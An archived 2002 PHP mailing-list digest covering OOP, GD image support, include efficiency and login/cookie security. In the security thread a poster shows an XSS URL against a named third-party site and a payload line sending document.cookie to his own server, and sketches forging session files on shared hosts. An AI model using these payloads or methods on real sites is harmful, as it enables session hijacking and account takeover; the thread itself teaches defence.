NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > PHP Discussion Digest> 2002-07

php-general-digest-help_at_lists.php.net
Date: Wed Jul 17 2002 - 04:42:49 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

php-general Digest 17 Jul 2002 09:42:49 -0000 Issue 1469

Topics (messages 107973 through 108045):

Re: Classes vs. Functions
        107973 by: Alberto Serra
        107984 by: Martin Towell
        108013 by: Michael Hall
        108021 by: Peter J. Schoenster
        108022 by: Martin Towell

GIF Manipulation
        107974 by: Nick Oostveen
        107980 by: Jason Reid
        107983 by: Danny Shepherd

pros and cons of ezpublish
107975 by: Peter J. Schoenster

contents from a database
107976 by: Dan
107988 by: Ralph

Re: Editing files by line
107977 by: Onaje Johnston
107987 by: Analysis & Solutions

Re: Newbie Question on Efficiency
107978 by: Monty

Re: Sessions / logins / cookies / security
        107979 by: Chris Shiflett
        107992 by: Justin French
        108001 by: John Holmes
        108002 by: Analysis & Solutions
        108004 by: Justin French
        108005 by: Justin French
        108007 by: John Holmes
        108011 by: Justin French
        108012 by: John Holmes
        108016 by: Justin French
        108018 by: John Holmes
        108019 by: Justin French
        108032 by: César Aracena
        108044 by: John Holmes

Re: Newbie Question on Efficiency : Follow-up Question
        107981 by: Michael Kennedy
        107998 by: John Holmes
        108000 by: Analysis & Solutions
        108023 by: Michael Kennedy
        108024 by: Martin Towell
        108027 by: Michael Kennedy

calling a cgi script from php
        107982 by: rdkurth.starband.net
        107999 by: John Holmes
        108009 by: Jason Wong

transparent clusters + sessions
        107985 by: Chris Knipe
        108020 by: Tom Rogers
        108026 by: Chris Knipe

mcrypt
107986 by: Peter
107991 by: Danny Shepherd

Re: Fopen errors out when opening a URL
107989 by: Analysis & Solutions

Re: I can't echo object variables
107990 by: Analysis & Solutions

Re: Using index.php instead of index.html
        107993 by: Mark Gallagher
        107996 by: Chris Kay
        108003 by: Chris Knipe
        108010 by: Michael Hall
        108017 by: Jason Wong

Re: Preventing Multiple Log-Ins after Authentication
107994 by: Analysis & Solutions
108037 by: Lars Olsson

Printer margins
107995 by: Manuel
107997 by: Martin Towell

problem with IMAP support
108006 by: Jeff Schwartz
108015 by: Jason Wong

Re: activating php scripts via cron
108008 by: Michael Hall
108014 by: Jason Wong

Break message in code.
        108025 by: W. Andy Roche
        108028 by: Jason Reid
        108029 by: Analysis & Solutions

Bug in PHP?
108030 by: Aleks D.
108031 by: Martin Towell

Strong Web Hosts in Canada?
108033 by: Analysis & Solutions

Re: PHP and Jigsaw
108034 by: Murray Nicholas

Re: Opening and Editing Quark Binaries
        108035 by: Miguel Cruz
        108040 by: Justin French
        108041 by: Justin French

Require some help about the date comparison
        108036 by: Manisha
        108038 by: Jason Wong
        108039 by: Andrey Hristov
        108043 by: John Holmes

Problem on file_exists() function
108042 by: Jack

Re: IF inside LOOP?
108045 by: Ford, Mike [LSS]

Administrivia:

To subscribe to the digest, e-mail:
php-general-digest-subscribelists.php.net

To unsubscribe from the digest, e-mail:
php-general-digest-unsubscribelists.php.net

To post to the list, e-mail:
php-generallists.php.net

----------------------------------------------------------------------

attached mail follows:

ðÒÉ×ÅÔ!

Martin Clifford wrote:
> Could someone please explain the difference between classes and functions
> and how to use a class.

Well, that's a 1 billion $$ question. I don't think one can fully grasp
that difference by reading an email. I strongly suggest you to buy
yourself a book about OOP and have a go at it. That is, if you really
care about knowing.

Whether you should like OOP or not is a religious matter, so I will not
enter the field. OOP has its pluses and its minuses. It's a technique,
not an ultimate truth, although it is often presented as such. And as
any technique, it can do wonders and it can do plain bull**t when not
properly used.

Nowadays 100% of my work is OOP based, but I worked some 15 years on
functions and I cannot blame those who keep working that way. There are
reasons for doing it and reason for not to do it. Get yourself a good
clear book, then make a decision.

ÐÏËÁ
áÌØÂÅÒÔÏ
ëÉÅ×

-_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_--_=}{=_-

LoRd, CaN yOu HeAr Me, LiKe I'm HeArInG yOu?
lOrD i'M sHiNiNg...
YoU kNoW I AlMoSt LoSt My MiNd, BuT nOw I'm HoMe AnD fReE
tHe TeSt, YeS iT iS
ThE tEsT, yEs It Is
tHe TeSt, YeS iT iS
ThE tEsT, yEs It Is.......

attached mail follows:

>
> Martin Clifford wrote:
> > Could someone please explain the difference between classes and
functions
> > and how to use a class.
>
> Whether you should like OOP or not is a religious matter, so I will not
> enter the field. OOP has its pluses and its minuses. It's a technique,
> not an ultimate truth, although it is often presented as such. And as
> any technique, it can do wonders and it can do plain bull**t when not
> properly used.
>
> Nowadays 100% of my work is OOP based, but I worked some 15 years on
> functions and I cannot blame those who keep working that way. There are
> reasons for doing it and reason for not to do it. Get yourself a good
> clear book, then make a decision.

[snip]

I have to agree here. IMO, there are benefits in using classes over
functions, and there's benefits in using functions over classes. Once you
get to know oop a little better, you should be able to determine which is
better is any given situation.

attached mail follows:

There is no simple answer here. I have started using classes where I find
I am writing a lot of related functions that share similar
parameters. Database connection and queries are a good
example. Authentication is another.

I have another class that builds forms, because I just hate the tedium of
coding HTML forms by hand. It is really just a collection of functions,
though, and could work fine as such.

I'm still learning/exploring ... I am always guided by the principle that
whatever makes less work for me (but achieves the same result) is probably
a good thing.

IMHO classes are best for more universal code that really can be used in
many different places. My functions tend to be more application specific.

My 2 cents

Michael

On Tue, 16 Jul 2002, Chris Crane wrote:

> Could someone please explain the difference between classes and functions
> and how to use a class. I write alot of PHP, but I never understood this at
> all. I use an include statement in many of my pages and include a file with
> a bunch of functions. For instance, I might have a function called stock();
> In the page I am using I include the file that has this function and I call
> it like this:
>
> stock($Sym);
>
> I am wondering if I am doing it the wrong way. So I need to better
> understand classes. What is one, and why would you use it?
>
> Thanks.
>
>
>
>

-- -------------------------------- n i n t i . c o m php-python-perl-mysql-postgresql -------------------------------- Michael Hall ninti

ninti.com --------------------------------

attached mail follows:

On 17 Jul 2002 at 12:43, Michael Hall wrote:

> There is no simple answer here. I have started using classes where I > find I am writing a lot of related functions that share similar > parameters. Database connection and queries are a good example. > Authentication is another.

Yeah.

> I have another class that builds forms, because I just hate the tedium > of coding HTML forms by hand. It is really just a collection of > functions, though, and could work fine as such.

This is a gray area imho. I'd leave all html to the person who cares what it looks like, not what it does. I usually also use a code generator to create html and their forms but they are a separate layer. I use templates, wish a lot more php people would as well although I've seen some weird stuff where in this one bb they store templates in the database. That's interesting.

> I'm still learning/exploring ... I am always guided by the principle > that whatever makes less work for me (but achieves the same result) is > probably a good thing. > > IMHO classes are best for more universal code that really can be used > in many different places. My functions tend to be more application > specific.

Yeah, can't say too much more than that. There is the style of coding where one application is completely independent of another. Then you begin to realize, gee ... I could just cut and paste this code. And then there's always the funny repetion of the exact same code every 30 lines or so (depending on memory of programmer I guesss). Eventually you begin to realize gee ... could I put this stuff in a library. A CLASS after all is just a collection of functions with a data model. But ... there is modular and then there is OO imho. I'm a die hard modular programmer who is trying to think in a more OO way. But of course when you just gotta get something done, do it. The value in spending a bit more time going the modular/OO route is that your application will be easier to evolve and debug.

Peter-- http://www.readbrazil.com/ Answering Your Questions About Brazil

attached mail follows:

[snip] > A CLASS after all is just a collection of functions with a > data model. But ... there is modular and then there is OO imho. [snip]

A class is more than just a bunch of functions that have been placed together. If you want to do that, then you might as well just throw them all into the same include file and that's it. There's no added benefit in wrapping a class around them.

Agreed, a class can be used to simulate the C-style struct, or to collect a bunch of functions, but the real power of classes is when you start to model the "real world" objects (ie, methods and properties, not just functions and variables.)

I'm not saying to go all OO (or all procedule, I use both...), just that when used correctly, they can be really helpful.

attached mail follows:

I'm currently developing a site which needs the ability to do server-side image cropping and resizing. I currently have a current version of GD installed with PHP, however the lack of support for GIFs is causing endless headaches.

Is there any way to support GIFs in PHP without reverting to an older version of GD (and loosing PNG support in the process)?

Nick Oostveen

attached mail follows:

AFAIK there is a patch to re-add gif support to gd 1.8.4 (not sure about 2.x). I saw the url for it the other day on a newsgroup, I'll see if i can dig it up and post it.

Jason Reid jasonachost.ca

----- Original Message ----- From: "Nick Oostveen" <nicko-mlhpmarketing.com> To: <php-generallists.php.net> Sent: Tuesday, July 16, 2002 3:58 PM Subject: [PHP] GIF Manipulation

> I'm currently developing a site which needs the ability to do server-side > image cropping and resizing. I currently have a current version of GD > installed with PHP, however the lack of support for GIFs is causing endless > headaches. > > Is there any way to support GIFs in PHP without reverting to an older > version of GD (and loosing PNG support in the process)? > > Nick Oostveen > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php >

attached mail follows:

GD2 does have a compile time option which will re-enable support for writing GIFs. AFAIK you're only legally allowed to enable it if you live outside of the US/Canada.

HTH

Danny.

----- Original Message ----- From: "Jason Reid" <jasonexumweb.net> To: <php-generallists.php.net>; "Nick Oostveen" <nicko-mlhpmarketing.com> Sent: Wednesday, July 17, 2002 12:04 AM Subject: Re: [PHP] GIF Manipulation

> AFAIK there is a patch to re-add gif support to gd 1.8.4 (not sure about > 2.x). I saw the url for it the other day on a newsgroup, I'll see if i can > dig it up and post it. > > Jason Reid > jasonachost.ca > > ----- Original Message ----- > From: "Nick Oostveen" <nicko-mlhpmarketing.com> > To: <php-generallists.php.net> > Sent: Tuesday, July 16, 2002 3:58 PM > Subject: [PHP] GIF Manipulation > > > > I'm currently developing a site which needs the ability to do server-side > > image cropping and resizing. I currently have a current version of GD > > installed with PHP, however the lack of support for GIFs is causing > endless > > headaches. > > > > Is there any way to support GIFs in PHP without reverting to an older > > version of GD (and loosing PNG support in the process)? > > > > Nick Oostveen > > > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php >

attached mail follows:

Hi,

Someone wants to know what I can do with ezpublish and so I've downloaded it.

Wow ... just looking at it now. What a package. ezpublish.

I'd like to test this on a virtural server (can't afford my own box on the net) and I have a host where I can modify my apache conf files ... but I wonder. I've even got access to imagemagick but I have to call it direct.

Anyone with some experience or advice on ezpublish? It's about 14 meg uncompressed. Bloatware or is it worth the effort?

Thanks,

Peter

attached mail follows:

I have a script that can desplay all the contents from a database but I need the result to equil a variable, but when I do this it only desplays one line from the database. I used to know this but I lost the info that I was given.

this is the script I am using..

$query = "SELECT * FROM content WHERE section='$section' "; $result = mysql_query($query);

while($res = mysql_fetch_array($result)) { $sub="<a href='index2.html?section=".$res[section]."&code=".$res[code]."'>".$res[art_ name]."</a> "; }

I know there is something I can add after $sub. Please can you tell me what it is? thanks heaps, Dan

attached mail follows:

You need to use the concatenating assignment operator .= after $sub. The way you had it the variable $sub was getting assigned a new value each time through the while loop. The .= oprerator will add to the existing value of $sub each time through the loop.

Try this:

$query = "SELECT * FROM content WHERE section='$section' "; $result = mysql_query($query);

while ($row = mysql_fetch_array($result)) { $sub .= "<a href='index2.html?section=" . $res[section] . "&code=" . $res[code] . "'>" . $res[art_name] . "</a> \n"; }

Good luck :-)

attached mail follows:

-----Original Message----- From: Analysis & Solutions Sent: Tuesday, July 16, 2002 4:40 PM To: PHP List Subject: Re: [PHP] Re: Editing files by line

On Tue, Jul 16, 2002 at 04:25:25PM -0400, Onaje Johnston wrote: >> >> if ($insert && $linenumber) {

>But, if $linenumber is 0, this process won't happen. And, that was the >complaint you mentioned up front. > >So, you should do an "isset($linenumber)" instead.

>--Dan

Thanks.

It works using "if ($insert && isset($linenumber)) {".

So because the value of linenumber is 0 on the first line, the if statement was evaluating to false and therefore the update wouldn't occur, correct?

attached mail follows:

On Tue, Jul 16, 2002 at 06:38:04PM -0400, Onaje Johnston wrote: > > It works using "if ($insert && isset($linenumber)) {". > > So because the value of linenumber is 0 on the first line, the if statement > was evaluating to false and therefore the update wouldn't occur, correct?

Exactly. If statements need something that's not '' or 0 in order to evaluate as positive.

--Dan

-- PHP classes that make web design easier SQL Solution | Layout Solution | Form Solution sqlsolution.info | layoutsolution.info | formsolution.info T H E A N A L Y S I S A N D S O L U T I O N S C O M P A N Y 4015 7 Av #4AJ, Brooklyn NY v: 718-854-0335 f: 718-854-0409

attached mail follows:

If you have have a large number of functions, it might be better to separate them into a few files that you can include as needed. I use one file that contains functions needed by every page. I have a few other files that contain functions that aren't needed by every page, so, I include them only on pages that need them. But most functions go in the main include file used on every page.

Separating them will also minimize some overhead if you have a lot of functions. Otherwise, if your include files aren't War & Peace in length, one include file is fine.

>>>> mek2600realitycodec.net 07/16/02 04:59PM >>> > Hello everyone, I'm a newbie and have a question on style that I've not > seen addressed anywhere. I have a large number of frequently used > functions that I'm trying to find a good way to organize. The method > I'm thinking of using is to simply create a .php file called, for > example, functions.php. Then, just include the file at the top of each > page that needs any of the functions, and just call them as needed. My > question is this- if that file gets very large with tons of different > functions, is that an inefficient method? I'm not entirely clear on how > PHP is parsed and passed to the client. I assume it would be best to > divide up the functions into multiple files (ex. dbfunctions.php, etc.), > but is that still the best method? Basically, I'm just curious on how > you guys handle things like this. > > Thanks in advance. > Michael Kennedy >

attached mail follows:

Chad Day wrote:

>What I'm looking to do is when a user logs in, I start up the session.. I >then have the registered session var to verify they are authenticated as >they move throughout the site. > >Now, when they close the browser and come back, I want them to still be >authenticated. Obviously, I have to set a cookie. But what do I set? Do I >set just their user ID? The MD5 of their password? What's the most secure >way, that's not easily spoofed? I don't know that much about cookies, but >if I just use a user ID, couldn't someone just change that ID value and >'become' another user? >

Chad,

It sounds like you already have a good idea about the insecurity of the method you mentioned. For the most part, trust your instincts, especially when something seems insecure. :-) You just need to try to come up with a method that is difficult to break. Use your creativity, and for each method you can think of, consider what steps must be taken to break the security of that method. There is always a way, but "changing the user ID" isn't very difficult to achieve.

The cookie is a good idea, but the value of the cookie is what you need to think about. If its value is, as you mentioned, a user ID, someone could try to guess another valid user ID to impersonate another user. Remember that the cookie is data coming from the client that should not be trusted at all. Take the same precautions against client data as you would candy from a stranger; it doesn't mean it's necessarily bad candy, but you need to create some methods to give yourself pretty good assurance that it's not poisoned, etc. You want to inspect it.

In your case, you want to create some methods of assuring, to a reasonable extent, that the cookie is coming from the same client as before. With each connection, there are several things you can check, and you can decide whether its more appropriate to store the data you want to check on the client or on the server.

For example, if you were to store the IP address in the cookie also, then someone would have to be coming from the same IP address as before (it would seem). Of course, an observant attacker would change the value of this cookie to their own IP to see if that helped them bypass this check, which it would. What if, instead, you stored the IP address on the server in a database associated with the unique ID? Then you can at least be fairly assured that this value cannot be changed. Another option for you might be to encrypt the IP address and keep it in the cookie. This way, if someone else tried to use the same cookie, their IP address would have to appear to be the same (which of course would happen if it's the same computer).

Other information you can get from the client includes the browser type, date, etc. The more things you check, and the more difficult you make it for the client to change this data (otherwise your checks aren't very useful), the more difficult you make impersonation. Just make sure to also cater to your legitimate users, which hopefully there will be more of. :-) If your users connect through a large LAN with multiple proxies, their IP address may fluctuate. Dialup users may have fluctuating IPs as well. If you require someone who fails your checks to only provide their password to continue, then the hassle you give your legitimate users is very minimal, and they might appreciate knowing you're looking out for the safety of their data.

These are just some ideas. You're ultimately the best person to decide what security model is best for your needs. Like I said, try to be creative and trust your instincts. A good procedure might be to design what you think is a sufficiently strong and useful security model for your needs and ask the list to come up with hypothetical methods that could be used to break it. If the attacks seem very easy to accomplish, you might need to rethink your methods.

Anyway, my point is that you want to educate yourself enough that *you* design the security of your site. Trusting others for your security is no better than trusting candy from strangers. :-)

Happy hacking.

Chris

attached mail follows:

On my sites, I have a check box next to the login form which says "remember me". If they tick this box, and they userid/password is valid, I set a cookie on their system which remembers them, which is just their username and an md5() of their pasword (the same data I add to the session).

When maintaining the session, I first check if there is a $_SESSION['uid'] and $_SESSION['pwd'] -- if there is, I validate them (check against the db).

If not, I then look for them in my cookie... if they exist, I validate them (check against the db), and assign them to the session.

So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If there's nothing there, they aren't logged in as far as I can tell. On every page I validate the uid and pwd against the database, so the only way you could fake being another user is to know the uid AND md5()'d pwd.

Justin French

on 17/07/02 2:30 AM, Chad Day (cdayatpco.com) wrote:

> I asked something similar a little while ago, but didn't do a good job > clarifying. > > What I'm looking to do is when a user logs in, I start up the session.. I > then have the registered session var to verify they are authenticated as > they move throughout the site. > > Now, when they close the browser and come back, I want them to still be > authenticated. Obviously, I have to set a cookie. But what do I set? Do I > set just their user ID? The MD5 of their password? What's the most secure > way, that's not easily spoofed? I don't know that much about cookies, but > if I just use a user ID, couldn't someone just change that ID value and > 'become' another user? > > Thanks for any advice, > Chad >

attached mail follows:

> So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If > there's nothing there, they aren't logged in as far as I can tell. On > every > page I validate the uid and pwd against the database, so the only way you > could fake being another user is to know the uid AND md5()'d pwd.

Or steal it. :)

I hope you have checked your site for any cross-site scripting vulnerabilities. This is exactly where vulnerabilities like this come into play...

---John Holmes...

attached mail follows:

On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote: > I set a > cookie on their system which remembers them, which is just their username > and an md5() of their pasword (the same data I add to the session).

OUCH! Sending the password back out to the net is a scarry prospect.

--Dan

attached mail follows:

on 17/07/02 11:11 AM, Analysis & Solutions (danielcanalysisandsolutions.com) wrote:

> On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote: >> I set a >> cookie on their system which remembers them, which is just their username >> and an md5() of their pasword (the same data I add to the session). > > OUCH! Sending the password back out to the net is a scarry prospect.

Interesting -- I haven't actually implemented this on a live site, but was about to in the next few days... might hold off :)

How else can you verify the user in a "remember me" situation?

Justin

attached mail follows:

on 17/07/02 11:11 AM, John Holmes (holmes072000charter.net) wrote:

> Or steal it. :) > > I hope you have checked your site for any cross-site scripting > vulnerabilities. This is exactly where vulnerabilities like this come > into play...

Interesting -- I'm only a few days away from launching this... could you elaborate on the potential risk, or point me to some documentation?

Thanks heaps,

Justin French

attached mail follows:

> > Or steal it. :) > > > > I hope you have checked your site for any cross-site scripting > > vulnerabilities. This is exactly where vulnerabilities like this come > > into play... > > Interesting -- I'm only a few days away from launching this... could you > elaborate on the potential risk, or point me to some documentation?

Just search google for Cross Site Scripting and you'll find a ton of articles about that specifically. It all comes down to validating user input and not displaying it directly back to the screen.

Here is a link, for example, that'll pop up your cookies for cnn.com. (watch the wrapping!)

http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3 B%3C%2Fscript%3E

Now, how about instead of just executing alert("Hi"), I do a location.href='www.myserver.com?var='+document.cookie; and send myself your cookie. Then I just simply make my cookie match yours, and poof, I'm you. :)

It all comes down to validating user input and never showing it directly back to the browser/screen.

Similar problems exist for variables you use in database queries...

---John Holmes...

attached mail follows:

Thanks heaps John,

So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :)

So, how do you implement a "remember me" safely?

Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, errrr, impossible :)

Justin

> Just search google for Cross Site Scripting and you'll find a ton of > articles about that specifically. It all comes down to validating user > input and not displaying it directly back to the screen. > > Here is a link, for example, that'll pop up your cookies for cnn.com. > (watch the wrapping!) > > http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf > =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3 > B%3C%2Fscript%3E > > Now, how about instead of just executing alert("Hi"), I do a > location.href='www.myserver.com?var='+document.cookie; and send myself > your cookie. Then I just simply make my cookie match yours, and poof, > I'm you. :) > > It all comes down to validating user input and never showing it directly > back to the browser/screen. > > Similar problems exist for variables you use in database queries... > > ---John Holmes... >

attached mail follows:

> So as a basic rule, having a uid and pwd stored as session variables is > NOT > the problem, but storing the uid and/or pwd in a cookie on the browser is > just plain asking for it :)

You shouldn't even have to do this. Just set a $_SESSION['logged_on'] variable to true and check for that. Why carry around the username and password?? > So, how do you implement a "remember me" safely?

You don't, if you have anything to protect. If it's just for a forum or convenience and might just cause a little headache is someone's user is hijacked, then you can do it with a cookie.

> Setting JUST the uid in a cookie prevents people from knowing the pwd, but > I > have to validate the user before granting access to pages... without a > pwd, > it seems, errrr, impossible :)

Why do people insist on it being something related to the username and password. Just use uniqid() and md5() to create a unique id for the use, save it in their table, and use that in the cookie. If you base it off of something, it makes it easier to crack...

---John Holmes...

attached mail follows:

on 17/07/02 12:35 PM, John Holmes (holmes072000charter.net) wrote:

> You shouldn't even have to do this. Just set a $_SESSION['logged_on'] > variable to true and check for that. Why carry around the username and > password??

Well, I guess it's because I started with someone else's script, and built my own from there. Not being a security expert, I assumed that they did this for a reason.

Are you saying that setting $_SESSION['logged_on'] after I've validated their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

Interesting stuff...

So the real problem with sessions is hijacking the session ID, not fake $_SESSION vars.

I guess I need to look into session hijacking next.

>> So, how do you implement a "remember me" safely? > > You don't, if you have anything to protect. If it's just for a forum or > convenience and might just cause a little headache is someone's user is > hijacked, then you can do it with a cookie.

What about if the cookie was set under https / SSL

> Why do people insist on it being something related to the username and > password. Just use uniqid() and md5() to create a unique id for the use, > save it in their table, and use that in the cookie. If you base it off > of something, it makes it easier to crack...

Good point.

Thanks for your advice.

Justin French

attached mail follows:

> > You shouldn't even have to do this. Just set a $_SESSION['logged_on'] > > variable to true and check for that. Why carry around the username and > > password?? > > Well, I guess it's because I started with someone else's script, and built > my own from there. Not being a security expert, I assumed that they did > this for a reason. > > Are you saying that setting $_SESSION['logged_on'] after I've validated > their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ?

Sure, why not? Users can't create session variables (unless you're on a virtual server...)

> Interesting stuff... > > So the real problem with sessions is hijacking the session ID, not fake > $_SESSION vars.

Correct. The good thing with sessions is that they only last for as long as the browser is open. So you can't come back and hijack a user. You'd have to do it at the same time that the user is online. > > I guess I need to look into session hijacking next. > > > >> So, how do you implement a "remember me" safely? > > > > You don't, if you have anything to protect. If it's just for a forum or > > convenience and might just cause a little headache is someone's user is > > hijacked, then you can do it with a cookie. > > What about if the cookie was set under https / SSL

It makes it secure from sniffing... I don't think it would help for a cross site scripting vulnerability, though...

---John Holmes...

attached mail follows:

on 17/07/02 1:05 PM, John Holmes (holmes072000charter.net) wrote:

> Sure, why not? Users can't create session variables (unless you're on a > virtual server...)

... and I am -- A shared host server that is.

Justin French

attached mail follows:

I came across the same problem a few week ago, and thought (didn't do it though) that the best way to handle this kind of security, would be to make an ID/cookie for the user/session which deletes itself after the browser is closed, but not storing the password.

Then, if that same user wants to open a new session in other computer at the same time, I would have a *REPLICATION* script which looks up that user and tells him that he already has an open session and that should type the password again (like Hotmail does). Makes sense?

> -----Original Message----- > From: 1LT John W. Holmes [mailto:holmes072000charter.net] > Sent: Tuesday, July 16, 2002 4:51 PM > To: Chad Day; php-generallists.php.net > Subject: Re: [PHP] Sessions / logins / cookies / security > > There really isn't a good way to do this, I think. > > Any time you're taking just a cookie, and using that data to assume who > the > user is, it's open to hijacking. I can sniff the cookie or maybe find a > cross-site scripting bug to steal it, create the same cookie on my > machine, > and poof, i'm that user. > > Now, if it's just for a forum, or something simple, then just do it. It's > not worth worrying about someone hijacking my forum user. > > Anyway, the best way to create the unique id is to use uniqid() in combo > with md5(). That'll give you a 32 character string that's hard to predict > and isn't based on any of the user data. > > www.php.net/uniqid > > ---John Holmes... > > ----- Original Message ----- > From: "Chad Day" <cdayatpco.com> > To: <php-generallists.php.net> > Sent: Tuesday, July 16, 2002 3:30 PM > Subject: RE: [PHP] Sessions / logins / cookies / security > > > > Anyone? Can someone at least point me to some web article for > > recommendations? I saw some examples where a password variable was > stored, > > but is that really safe (as long as I MD5 it first?) > > > > Chad > > > > -----Original Message----- > > From: Chad Day [mailto:cdayatpco.com] > > Sent: Tuesday, July 16, 2002 12:30 PM > > To: php-generallists.php.net > > Subject: [PHP] Sessions / logins / cookies / security > > > > > > I asked something similar a little while ago, but didn't do a good job > > clarifying. > > > > What I'm looking to do is when a user logs in, I start up the session.. > I > > then have the registered session var to verify they are authenticated as > > they move throughout the site. > > > > Now, when they close the browser and come back, I want them to still be > > authenticated. Obviously, I have to set a cookie. But what do I set? > Do > I > > set just their user ID? The MD5 of their password? What's the most > secure > > way, that's not easily spoofed? I don't know that much about cookies, > but > > if I just use a user ID, couldn't someone just change that ID value and > > 'become' another user? > > > > Thanks for any advice, > > Chad > > > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

> > Sure, why not? Users can't create session variables (unless you're on a > > virtual server...) > > ... and I am -- A shared host server that is.

Now I'm not sure on this, I haven't tested it. Has anyone?

If we're on a virtual server, why can't I just open the session.save_path with PHP and read all of the files. Determine which one is yours and try to determine which variables you are saving. Say you are setting $_SESSION['logged_in'] = 1 and $_SESSION['admin'] = "Yes". Then your session file will look like a serialized version of the $_SESSION array.

So say I figure out which ones are yours. I use a PHP script to write my own bad_session_file.whatever in the session folder. Then I call up your web page with www.example.com?PHPSESSID=bad_session_file and PHP will load up the session file I just created and make me an admin...

Like I said, I haven't tested it though. Safe mode might protect against this, not sure. Anyone have any experience here?

---John Holmes...

attached mail follows:

OK, if I understand C++ correctly, if I write a program and #include <iostream.h> or something similar and compile the program it only compiles with the used functions in it, right? So, if I never use 'cin' it leaves that function out of the final complied app.

Does/can PHP do anything similar? I'm always much more comfortable with a language when I can understand how it works and I'm sure some of you feel the same.

Now, I fully understand that PHP documents are not even close to being compiled in the traditional sense. But, I'm wondering if it pulls all the necessary functions into memory when the page is accessed, then uses them when needed, or does it pull the whole include()d file into memory and just combine the whole mess together into one big memory heap and run like that?

My gut tells me that it's the second one, but I'm just wanting to be sure. Of course, the answer likely won't make a single difference in my life, but I'm just curious... Also, I hope the above question isn't stupid. I do have a habit of thinking about something for a while and then having it suddenly hit me later that the answer is simple very trivial. Ah, well...

Thanks for humoring me. Michael

-----Original Message----- From: Monty [mailto:monty3hotmail.com] Sent: Tuesday, July 16, 2002 5:44 PM To: php-generallists.php.net Subject: Re: [PHP] Newbie Question on Efficiency

Separating them will also minimize some overhead if you have a lot of functions. Otherwise, if your include files aren't War & Peace in length, one include file is fine.

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

PHP loads everything up before it starts doing anything. It's only going to execute the code it needs to, though, of course. I asked this question a while ago and got that answer. The process of loading all of the code is minimal, though, compared the actually executing the code.

---John Holmes...

> -----Original Message----- > From: Michael Kennedy [mailto:mek2600realitycodec.net] > Sent: Tuesday, July 16, 2002 7:26 PM > To: php-generallists.php.net > Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question > > OK, if I understand C++ correctly, if I write a program and #include > <iostream.h> or something similar and compile the program it only > compiles with the used functions in it, right? So, if I never use 'cin' > it leaves that function out of the final complied app. > > Does/can PHP do anything similar? I'm always much more comfortable with > a language when I can understand how it works and I'm sure some of you > feel the same. > > Now, I fully understand that PHP documents are not even close to being > compiled in the traditional sense. But, I'm wondering if it pulls all > the necessary functions into memory when the page is accessed, then uses > them when needed, or does it pull the whole include()d file into memory > and just combine the whole mess together into one big memory heap and > run like that? > > My gut tells me that it's the second one, but I'm just wanting to be > sure. Of course, the answer likely won't make a single difference in my > life, but I'm just curious... Also, I hope the above question isn't > stupid. I do have a habit of thinking about something for a while and > then having it suddenly hit me later that the answer is simple very > trivial. Ah, well... > > Thanks for humoring me. > Michael > > -----Original Message----- > From: Monty [mailto:monty3hotmail.com] > Sent: Tuesday, July 16, 2002 5:44 PM > To: php-generallists.php.net > Subject: Re: [PHP] Newbie Question on Efficiency > > If you have have a large number of functions, it might be better to > separate > them into a few files that you can include as needed. I use one file > that > contains functions needed by every page. I have a few other files that > contain functions that aren't needed by every page, so, I include them > only > on pages that need them. But most functions go in the main include file > used > on every page. > > Separating them will also minimize some overhead if you have a lot of > functions. Otherwise, if your include files aren't War & Peace in > length, > one include file is fine. > > > >>>> mek2600realitycodec.net 07/16/02 04:59PM >>> > > Hello everyone, I'm a newbie and have a question on style that I've > not > > seen addressed anywhere. I have a large number of frequently used > > functions that I'm trying to find a good way to organize. The method > > I'm thinking of using is to simply create a .php file called, for > > example, functions.php. Then, just include the file at the top of > each > > page that needs any of the functions, and just call them as needed. > My > > question is this- if that file gets very large with tons of different > > functions, is that an inefficient method? I'm not entirely clear on > how > > PHP is parsed and passed to the client. I assume it would be best to > > divide up the functions into multiple files (ex. dbfunctions.php, > etc.), > > but is that still the best method? Basically, I'm just curious on how > > you guys handle things like this. > > > > Thanks in advance. > > Michael Kennedy > > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

On Tue, Jul 16, 2002 at 06:25:42PM -0500, Michael Kennedy wrote: > OK, if I understand C++ correctly, if I write a program and #include > <iostream.h> or something similar and compile the program it only > compiles with the used functions in it, right? So, if I never use 'cin' > it leaves that function out of the final complied app. > > Does/can PHP do anything similar?

Nope. Everything is brought into memory at compile time. Or at least that's the way I understood it to be. I suspect it's still the case.

--Dan

attached mail follows:

